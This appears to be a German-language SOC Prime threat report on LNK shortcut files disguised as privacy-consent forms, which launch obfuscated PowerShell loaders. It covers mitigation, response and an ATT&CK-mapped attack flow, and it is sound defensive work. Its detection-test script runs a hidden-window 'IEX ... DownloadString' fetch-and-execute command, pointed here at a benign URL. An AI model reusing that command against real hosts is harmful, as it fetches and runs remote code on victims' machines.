SOC Prime Bias: Hoch

19 Jun 2026 07:26 UTC

Was steckte wirklich in der Verknüpfungsdatei, die als Datenschutzerklärungsformular getarnt war?

Author Photo
SOC Prime Team linkedin icon Folgen
Was steckte wirklich in der Verknüpfungsdatei, die als Datenschutzerklärungsformular getarnt war?
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Bedrohungsakteure verteilen bösartige LNK-Dateien, die als Datenschutzerklärungsformulare getarnt sind, um Benutzer dazu zu verleiten, sie zu öffnen. Bei Ausführung starten diese Verknüpfungsdateien verschleierte PowerShell-Befehle, die zusätzliche Nutzdaten mithilfe von fileless-Techniken abrufen und ausführen. Die Angriffskette ist darauf ausgelegt, Informationen zu stehlen und einen Backdoor-Loader bereitzustellen, der den Zugang und die Persistenz aufrecht erhält.

Untersuchung

Die Untersuchung ergab, dass die LNK-Dateien verschleierten PowerShell-Code einbetten, der für das Herunterladen von Folge-Skripten verantwortlich ist. Diese sekundären Skripte umfassen einen Downloader, der Nutzdaten von legitimen Webdiensten abruft, und einen Loader, der sie direkt im Speicher ausführt. Der Bedrohungsakteur missbraucht auch den Windows Task Scheduler für Persistenz und verwendet Täuschungsdokumente, um die bösartigen Aktivitäten legitim erscheinen zu lassen.

Minderung

Organisationen sollten eine strikte Überprüfung von Dateierweiterungen durchsetzen und Benutzer über LNK-Dateien, die als normale Dokumente getarnt sind, warnen. Sicherheitsteams sollten die Aktivität des Task Schedulers, PowerShell-Ausführungsprotokolle und ausgehende Netzwerkverbindungen genau überwachen. Benutzer sollten auch geschult werden, sowohl den Absender als auch den Zustellungsweg jeder eingehenden Datei vor dem Öffnen zu überprüfen.

Reaktion

Wenn diese Aktivität erkannt wird, sollten Administratoren sofort verdächtige Task-Scheduler-Einträge und ungewöhnliche PowerShell-Skript-Erstellungen in benutzerzugänglichen Verzeichnissen überprüfen. PowerShell-Protokolle sollten analysiert und externe Verbindungen verfolgt werden, insbesondere solche, die legitime Cloud-Plattformen oder Web-Speicherdienste einbeziehen. Eine vollständige forensische Untersuchung sollte dann bei allen identifizierten bösartigen Skripten und unautorisiertem Netzwerkverkehr durchgeführt werden.

graph TB %% Klassendefinition classDef initial_access fill:#f96,stroke:#333,stroke-width:2px classDef execution fill:#69f,stroke:#333,stroke-width:2px classDef persistence fill:#6c6,stroke:#333,stroke-width:2px classDef discovery fill:#ff9,stroke:#333,stroke-width:2px classDef exfiltration fill:#f66,stroke:#333,stroke-width:2px %% Phase des initialen Zugriffs action_user_exec[„<b>Aktion</b> – <b>T1204.002 User Execution: Malicious File</b><br/>Opfer führt eine täuschende .LNK-Verknüpfung aus,<br/>die als Einverständniserklärung getarnt ist.“] class action_user_exec initial_access action_masquerade[„<b>Aktion</b> – <b>T1036.008 Masquerading: Masquerade File Type</b><br/>Die .LNK-Datei imitiert ein legitimes<br/>Formular zur Zustimmung persönlicher Daten.“] class action_masquerade initial_access %% Ausführungsphase action_obfuscation[„<b>Aktion</b> – <b>T1027.009 Obfuscated Files or Information: Embedded Payloads</b><br/>Die .LNK-Datei enthält eine verschleierte<br/>PowerShell-Skript-Payload.“] class action_obfuscation execution action_cloud_api[„<b>Aktion</b> – <b>T1059.009 Command and Scripting Interpreter: Cloud API</b><br/>Das PowerShell-Skript verwendet Cloud-Dienste,<br/>um zusätzliche schädliche Skripte herunterzuladen.“] class action_cloud_api execution action_proxy_exec[„<b>Aktion</b> – <b>T1216 System Script Proxy Execution</b><br/>Die Schadsoftware verwendet die Proxy-Ausführung<br/>von Systemskripten zur Tarnung.“] class action_proxy_exec execution action_reflective_load[„<b>Aktion</b> – <b>T1620 Reflective Code Loading</b><br/>Heruntergeladene Skripte werden dateilos<br/>direkt im Speicher ausgeführt.“] class action_reflective_load execution %% Persistenzphase action_scheduled_task[„<b>Aktion</b> – <b>T1053 Scheduled Task/Job</b><br/>Eine Aufgabe wird in der Windows-Aufgabenplanung<br/>registriert, um die Ausführung nach einem Neustart sicherzustellen.“] class action_scheduled_task persistence %% Erkennungsphase action_sys_info[„<b>Aktion</b> – <b>T1082 System Information Discovery</b><br/>PowerShell-Skript sammelt Informationen zum Betriebssystem,<br/>Netzwerkeinstellungen und IP-Adressen.“] class action_sys_info discovery action_query_reg[„<b>Aktion</b> – <b>T1012 Query Registry</b><br/>Das Skript fragt die Registrierung ab, um<br/>laufende Prozesse und Sicherheitsprodukte zu erkennen.“] class action_query_reg discovery %% Zielphase action_backdoor[„<b>Aktion</b> – <b>Backdoor loader-type</b><br/>Erhält den Zugriff aufrecht und ermöglicht<br/>weitere schädliche Aktivitäten.“] class action_backdoor exfiltration action_selective_exclusion[„<b>Aktion</b> – <b>T1679 Selective Exclusion</b><br/>Die Backdoor ermöglicht selektive Ausnahmen,<br/>um Sicherheitskontrollen zu umgehen.“] class action_selective_exclusion exfiltration %% Verbindungen action_user_exec –>|führt_zu| action_masquerade action_masquerade –>|löst_aus| action_obfuscation action_obfuscation –>|enthält| action_cloud_api action_cloud_api –>|setzt_ein| action_proxy_exec action_proxy_exec –>|führt_durch| action_reflective_load action_reflective_load –>|etabliert| action_scheduled_task action_scheduled_task –>|führt_aus| action_sys_info action_sys_info –>|führt_zu| action_query_reg action_query_reg –>|informiert| action_backdoor action_backdoor –>|ermöglicht| action_selective_exclusion

Angriffsablauf

Simulationsausführung

Voraussetzung: Der Telemetrie- & Basislinien Pre-flight Check muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die die Erkennungsregel auslösen soll. Die Befehle und Erzählungen MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennung erwartet wird. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.

  • Angriffserzählung & Befehle: Der Angreifer versucht, ersten Zugang zu etablieren und eine Malware-Nutzlast der zweiten Stufe herunterzuladen. Um eine Erkennung durch einfache Dateiscanner zu vermeiden, verwenden sie eine LNK (Verknüpfungs-) Datei. Diese LNK-Datei ist so gestaltet, dass powershell.exe in einem versteckten Fenster ausgeführt wird. Der an PowerShell übergebene Befehl verwendet Invoke-Expression and DownloadString um ein Skript von einer entfernten URL abzurufen. Dies ahmt realistische „Living-off-the-Land“ (LotL) Angriffe nach, bei denen legitime Binärdateien verwendet werden, um bösartige Aktionen durchzuführen, mit dem Ziel, traditionelle signaturbasierte Antivirenprogramme zu umgehen.

  • Regressionstest-Skript:

    # 1. Definieren Sie die Ziel-URL (unter Verwendung einer gutartigen Seite zum Testen)
    $url = "https://www.google.com"
    
    # 2. Erstellen Sie die bösartige PowerShell-Nutzdatenzeichenfolge
    # Diese Zeichenfolge ist so konzipiert, dass sie die Erkennung von 'DownloadString' und 'Invoke-Expression' auslöst
    $payload = "IEX (New-Object Net.WebClient).DownloadString('$url')"
    
    # 3. Erstellen eines Dummy-LNK-Dateiinhalts (simuliert)
    # Bei einem echten Angriff wäre dies eine binäre .lnk Datei.
    # Hier führen wir den Befehl direkt aus, um sicherzustellen, dass das SkriptBlock-Log zur Validierung generiert wird.
    Write-Host "[+] Simulierte bösartige PowerShell-Ausführung über LNK-Nutzdaten..."
    powershell.exe -WindowStyle Hidden -Command $payload
    
    Write-Host "[+] Simulationsbefehl ausgeführt. Überprüfen Sie die Ereignis-ID 4104."
  • Säuberungsbefehle:

    # Entfernen Sie alle Artefakte, falls Dateien erstellt wurden
    Remove-Item -Path "$HOMEDesktopSimuliertes_Bösartiges_LNK.lnk" -ErrorAction SilentlyContinue
    Write-Host "[+] Reinigung abgeschlossen."